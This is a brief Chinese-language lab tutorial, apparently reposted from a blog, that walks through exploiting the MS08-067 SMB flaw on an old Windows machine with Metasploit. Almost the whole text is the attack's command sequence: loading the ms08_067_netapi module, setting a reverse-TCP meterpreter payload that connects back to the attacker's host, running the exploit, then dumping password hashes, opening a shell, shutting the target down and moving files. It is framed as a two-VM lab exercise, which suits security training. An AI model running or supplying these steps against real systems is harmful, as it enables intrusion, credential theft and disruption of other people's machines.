拓扑环境:2台虚拟机,一台Kali,另一台有ms08067漏洞的XP或2000或2003机器
msfconsole进入msf控制台
输入search ms0-067
找到相应模块
use exploit/windows/smb/ms08_067_netapi 使用相应模块
set PAYLOAD windows/meterpreter/reverse_tcp 设置反弹连接
show options 查看设置选项
set RHOST 192.168.80.XX 设置远程主机
set LHOST 192.168.80.YY 设置本地主机
show targets 查看攻击目标系统类型
set target 1 目标机器为2000
exploit
等待攻击成功,出现meterpreter>
输入help查看可以使用命令
ipconfig 查看对方IP地址
hashdump获取对方hash值
shell使用shell命令,CTRL+Z进入后台,退出exit
shutdown
还可以上传下载文件等等
原文:http://luzhiping.blog.51cto.com/9334832/1696163